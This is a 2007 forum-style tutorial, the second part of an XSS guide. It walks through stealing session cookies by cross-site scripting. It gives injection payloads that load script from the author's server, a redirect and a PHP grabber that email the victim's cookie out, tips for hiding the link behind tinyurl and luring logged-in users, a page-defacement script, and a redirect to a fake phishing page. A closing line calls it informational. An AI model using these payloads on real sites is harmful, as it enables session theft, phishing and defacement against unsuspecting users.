XSS Guide - Part 2
-------------------------------
Author: Langy
Data: 11-09-2007
Copyright: http://www.googlebig.com
-------------------------------
Links:
http://www.gnucitizen.org/xssdb/application.htm (Attack Database)
http://www.xssed.com (Mirror Archive of Vulnerable Websites)
http://ha.ckers.org/xss.html (XSS Cheat sheet)
http://software.graflex.org/dexss/ (Removing JavaScript from HTML)
http://en.wikipedia.org/wiki/Cross-site_scripting
-------------------------------
At this time we need to know the victim cookie and then comes in a "cookie grabbers". Cookie grabber is a script that stay on our server and it include into website url to send us cookies directly by the victim
Howto include a javascript file:
Code:
Code:
"><script src="http://www.googlebig.com/cookiescript.js"></script>
Into cookiescript.js we will write a code that displays the cookie and sends it by email.
First of all we need to create a redirect to our site including the variable of cookies.
then:
Code:
Code:
<script>location.href="http://googlebig.com/cookie.php?cookie=</script>
Now we create cookie.php
Code:
Code:
<? mail("admin@googlebig.com","Here s the cookie stolen",$_GET['cookie']; ?>
Now upload cookie.php and cookiescript.js on our server and then go to:
If everything works we will receiving cookie by email.
Now we send link to victim...we can send extended link or use a redirect service like http://www.tinyurl.com
Once created redirect, in this case http://tinyurl.com/2rgry5 , we can contact user, possibly through the same site to make sure that it open the link when it's is logged on the site.
XSS THAT DOESN'T WORK
If a xss does not work and therefore do not have the chance of a redirect or not displaying cookies, it can be used as a phishing page.
An example of code is:
Code:
PHP Code:
var title = "XSSED BY GOOGLEBIG.COM";var bgcolor = "#000000";
var image_url = "http://www.googlebig.com/googlebig.jpg";
var text = "Langy was here ;)";var font_color = "#FFFFFF";
deface(title, bgcolor, image_url, text, font_color);
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor)
{ document.title = pageTitle;
document.body.innerHTML = '';
document.bgColor = bgColor;
var overLay = document.createElement("div");
overLay.style.textAlign = 'center';
document.body.appendChild(overLay);
var txt = document.createElement("p");
txt.style.font = 'normal normal bold 36px Verdana';
txt.style.color = fontColor; txt.innerHTML = pageText;
overLay.appendChild(txt);
if (image_url != "") { var newImg = document.createElement("img");
newImg.setAttribute("border", '0');
newImg.setAttribute("src", imageUrl);
overLay.appendChild(newImg); }
var footer = document.createElement("p");
footer.style.font = 'italic normal normal 12px Arial';
footer.style.color = '#DDDDDD'; footer.innerHTML = title;
overLay.appendChild(footer);}
This code must be entered in this way:
Code:
Code:
http://[Sitevictim]/page.php?variable="><script src="http://www.googlebig.com/script.js"></script>
In this way we will see javascript that we created.
Even in this case we can rely on tinyurl to mask our complete url and include directly redirect.
Code:
Code:
http://[Sitevictim]/page.php?variable="><script src="http://tinyurl.com/xxxxx"></script>
Another way to bring the victim on the page that we want is this:
Code:
Code:
http://[Sitevictim]/page.php?variable="><script>
location.href="http://www.googlebig.com/fakepage.htm</script>
This guide was created for information purposes only.
If u have found a xss u must post it here http://www.xssed.com/submit and u must contact the vulnerable site's admin.